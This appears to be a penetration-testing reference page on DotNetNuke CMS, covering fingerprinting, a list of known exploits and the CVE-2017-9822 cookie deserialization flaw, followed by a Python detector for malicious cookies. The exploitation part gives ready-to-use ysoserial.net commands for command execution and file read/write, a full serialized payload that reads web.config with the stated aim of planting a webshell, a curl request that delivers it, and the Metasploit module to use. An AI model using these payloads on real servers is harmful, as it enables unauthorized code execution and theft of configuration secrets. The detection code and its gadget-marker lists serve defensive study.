# DotNetNuke

`DNN` (formerly `DotNetNuke`) is an open-source `Content Management System (CMS)`, written in `C#` and based on the `.NET` framework. Its core features can be extended through a wide range of third-party (or in-house) apps and modules that build on the `CMS` basic functionalities.

### Identification and discovery

**Version disclosure**

The `/Documentation/License.txt` file, if present, may hold information about the release year of the `DotNetNuke` version being used by the webserver.

```
DotNetNuke - http://www.dotnetnuke.com
Copyright (c) 2002-2017
by DotNetNuke Corporation
[...]
```

**Robots.txt**

By default, `DotNetNuke` installations configure a verbose `robots.txt` file, listing a number of built-in locations.

```
Disallow: /admin/
Disallow: /App_Browsers/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /App_GlobalResources/
Disallow: /bin/
Disallow: /Components/
Disallow: /Config/
Disallow: /contest/
Disallow: /controls/
Disallow: /DesktopModules/
Disallow: /Documentation/
Disallow: /HttpModules/
Disallow: /images/
Disallow: /Install/
Disallow: /js/
Disallow: /Portals/
Disallow: /Providers/
Disallow: /Resources/ContentRotator/
Disallow: /Resources/ControlPanel/
Disallow: /Resources/Dashboard/
Disallow: /Resources/FeedBrowser/
Disallow: /Resources/OpenForceAd/
Disallow: /Resources/Search/
Disallow: /Resources/Shared/
Disallow: /Resources/SkinWidgets/
Disallow: /Resources/TabStrip/
Disallow: /Resources/Widgets/
Disallow: /Activity-Feed/userId/	# Do not index user profiles
```

### Known vulnerabilities

**ExploitDB exploits (as of 2021-08-08)**

```
searchsploit DotNetNuke

DotNetNuke - Arbitrary File Upload                                                 | asp/webapps/12700.txt
DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)             | windows/remote/48336.rb
DotNetNuke 07.04.00 - Administration Authentication Bypass                         | asp/webapps/39777.txt
DotNetNuke 4.0 - HTML Injection                                                    | asp/webapps/28615.txt
DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption     | windows/remote/31465.cs
DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting                             | asp/webapps/31865.txt
DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting                           | asp/webapps/33009.txt
DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting                       | asp/webapps/35045.txt
DotNetNuke 6.1.x - Cross-Site Scripting                                            | asp/webapps/38696.txt
DotNetNuke 9.3.2 - Cross-Site Scripting                                            | multiple/webapps/47449.txt
DotNetNuke 9.5 - File Upload Restrictions Bypass                                   | aspx/webapps/48125.txt
DotNetNuke 9.5 - Persistent Cross-Site Scripting                                   | aspx/webapps/48124.txt
DotNetNuke < 9.4.0 - Cross-Site Scripting                                          | multiple/webapps/47448.py
DotNetNuke DNNArticle Module 10.0 - SQL Injection                                  | php/webapps/27602.txt
DotNetNuke DNNarticle Module 11 - Directory Traversal                              | windows/webapps/44414.txt
DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)                | windows/webapps/35039.rb
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)             | aspx/webapps/43405.rb
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)                | windows/webapps/17873.txt
```

**Cookie Deserialization Remote Code Execution (CVE-2017-9822)**

A deserialization vulnerability is present in the `DotNetNuke (DNN)` CMS, versions `5.0.0` to `9.3.0-RC`, which can be leveraged to remotely execute code on the underlying system without authentication. The vulnerability lies in the deserialization of the `DNNPersonalization` cookie (`XML` format), used to store the preferences of (authenticated or unauthenticated) users. This cookie is notably processed during the handling of `404` errors if `DNN`'s built-in default missing-page handler is used.

While the object `type` to deserialize is user-controlled in the `DNNPersonalization` cookie, the `XmlSerializer` class (used by `DNN` for the processing) cannot be used to serialize / deserialize types with interface members. As stated in the [original research paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf), the `ObjectDataProvider` class can be used in combination with one of the following methods:

* `XamlReader.Load(String)`, leading to remote code execution.
* `ObjectStateFormatter.Deserialize(String)`, leading to remote code execution.
* `DotNetNuke.Common.Utilities.FileSystemUtils.PullFile(String)`, for arbitrary file write (for example to upload a `webshell` if a writable path can be found).
* `DotNetNuke.Common.Utilities.FileSystemUtils.WriteFile(String)`, for arbitrary file read.

Note that the usable types may be limited to `DotNetNuke.*` classes (and thus to arbitrary file read / write).

The initial vulnerability is identified by `CVE-2017-9822`; a number of bypasses of the attempts at fixing the initial bug are identified as `CVE-2018-15811`, `CVE-2018-15812`, `CVE-2018-15825`, and `CVE-2018-15826`.

The following `DotNetNuke` versions are vulnerable:

* `5.0.0 to 9.1.0` ([CVE-2017-9822](https://www.cvedetails.com/cve/CVE-2017-9822/))
* `9.1.1` ([CVE-2018-15811](https://www.cvedetails.com/cve/CVE-2018-15811/))
* `9.2 to 9.2.1` ([CVE-2018-15812](https://www.cvedetails.com/cve/CVE-2018-15812/))
* `9.2.2 to 9.3.0-RC` ([CVE-2018-15825](https://www.cvedetails.com/cve/CVE-2018-15825/) and [CVE-2018-15826](https://www.cvedetails.com/cve/CVE-2018-15826/))

**Metasploit module (for exploitation before and after the CVE-2017-9822 patch)**

The `Metasploit` `exploit/windows/http/dnn_cookie_deserialization_rce` module can be used to exploit the deserialization remote code execution vulnerability, both before the initial `CVE-2017-9822` patch and, using the subsequent bypasses, after it.

The "[How to exploit the DotNetNuke Cookie Deserialization](https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/)" blog post can be consulted for information on how to exploit the vulnerability using `metasploit` depending on the targeted version.

```
msf > use exploit/windows/http/dnn_cookie_deserialization_rce
```

**Pre-patching exploitation (CVE-2017-9822) using ysoserial**

`ysoserial.net` can be used to generate `DotNetNuke` cookies that will result in the execution of the specified command or arbitrary read / write of the given file against `DotNetNuke` version `5.0.0 to 9.1.0`.

```
ysoserial.exe -p DotNetNuke -m run_command -c "<COMMAND>"
ysoserial.exe -p DotNetNuke -m read_file -f "<FILE | FILE_FULL_PATH>"
ysoserial.exe -p DotNetNuke -m write_file -u "<FILE_TO_FETCH_URL>" -f "<FILE>"

# Retrieves the "web.config" configuration file (in its default location) in order to identify the webserver hosted directories for the upload of a webshell.
.\ysoserial.exe -p DotNetNuke -m read_file -f C:\DotNetNuke\web.config
<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\DotNetNuke\web.config</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
```

The generated serialized cookie can then be sent to a non-existing page using, for example, the `curl` utility:

```
curl -i -s -k -X 'GET' \
    -b '.DOTNETNUKE=;DNNPersonalization=<SERIALIZED_PAYLOAD>' \
    'http://<IP | HOSTNAME>/pagedoesnotexist123456789abc'
```
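From the defender's side, the cookie shown above is easy to recognise: a legitimate `DNNPersonalization` profile holds simple value types, whereas the gadget chain names `ObjectDataProvider` / `ExpandedWrapper` types, a `MethodName` such as `WriteFile` or `PullFile`, and an `xsi:type` pointing at `FileSystemUtils`. The following check, an added example that is not part of `DNN` nor of the original notes, parses the cookie the way `XmlSerializer` would receive it and flags those indicators; it could run on a reverse proxy, in a WAF rule engine, or over captured request headers during incident review. The sample requests, the benign profile value, the `scan_requests` helper and the marker lists are constructed for the example; the malicious value is the `ysoserial.net` output quoted above.

```python
"""Inspect DNNPersonalization cookies for CVE-2017-9822-style gadget chains.

Added example (not DNN's own code): a lightweight check that can be applied
before the request reaches DotNetNuke, or over captured Cookie headers.
"""
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import unquote

# Type-name fragments that belong to deserialization gadget chains, not to the
# simple value types a legitimate personalization profile stores (constructed list).
GADGET_MARKERS = ("ObjectDataProvider", "ExpandedWrapper", "XamlReader",
                  "ObjectStateFormatter", "FileSystemUtils", "LosFormatter")
# Methods the known chains invoke through ObjectDataProvider (constructed list).
GADGET_METHODS = {"PullFile", "WriteFile", "Load", "Deserialize", "Start"}
XSI = "{http://www.w3.org/2001/XMLSchema-instance}"


def extract_cookie(cookie_header: str, name: str = "DNNPersonalization") -> Optional[str]:
    """Return the URL-decoded value of `name` from a raw Cookie header, or None."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote(value)
    return None


def analyse_profile(profile_xml: str) -> dict:
    """Parse a profile cookie and list every indicator of a gadget chain.

    Returns {"suspicious": bool, "reasons": [str], "types": [str]}.
    A value that does not parse as a plain <profile> document is reported
    too, since XmlSerializer would be handed the same bytes.
    """
    reasons, types = [], []
    try:
        root = ET.fromstring(profile_xml)
    except ET.ParseError as exc:
        return {"suspicious": True, "reasons": [f"unparseable XML: {exc}"], "types": types}
    if root.tag != "profile":
        reasons.append(f"unexpected root element <{root.tag}>")
    for item in root.iter("item"):
        # The attacker-controlled "type" attribute selects what gets deserialized.
        type_name = item.get("type", "")
        types.append(type_name)
        hits = [m for m in GADGET_MARKERS if m in type_name]
        if hits:
            reasons.append(f"gadget type on item {item.get('key')!r}: {', '.join(hits)}")
    for el in root.iter():
        # ObjectDataProvider payloads carry the target method as <MethodName>...
        if el.tag == "MethodName" and (el.text or "").strip() in GADGET_METHODS:
            reasons.append(f"method invocation requested: {el.text.strip()}")
        # ...and the receiving object as an xsi:type attribute.
        xsi_type = el.get(XSI + "type", "")
        if any(m in xsi_type for m in GADGET_MARKERS):
            reasons.append(f"xsi:type names a gadget class: {xsi_type}")
    return {"suspicious": bool(reasons), "reasons": reasons, "types": types}


def scan_requests(requests):
    """Apply the check to (client_ip, path, cookie_header) tuples; return findings."""
    findings = []
    for client_ip, path, cookie_header in requests:
        value = extract_cookie(cookie_header)
        if value is None:
            continue
        result = analyse_profile(value)
        if result["suspicious"]:
            findings.append({"client": client_ip, "path": path, "reasons": result["reasons"]})
    return findings


# Constructed benign profile, shaped like a normal preference entry.
BENIGN = '<profile><item key="Usability:UserMode" type="System.String">VIEW</item></profile>'
# The read_file gadget exactly as produced by ysoserial.net above.
MALICIOUS = r'''<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\DotNetNuke\web.config</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>'''

# Constructed sample requests (client IP, path, raw Cookie header).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/Default.aspx", ".DOTNETNUKE=abc; DNNPersonalization=" + BENIGN),
    ("203.0.113.7", "/pagedoesnotexist123456789abc", ".DOTNETNUKE=;DNNPersonalization=" + MALICIOUS),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding["client"], finding["path"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Matching on type names rather than on a fixed payload string is deliberate: the bypass CVEs listed above changed how the cookie was encoded and which types were used, but every chain still has to name the gadget class somewhere in the `type` or `xsi:type` attribute and request a method through `MethodName`, so those are the stable signals to alert on.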

***

### References

<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf>

<https://www.exploit-db.com/exploits/48336>

<https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/>
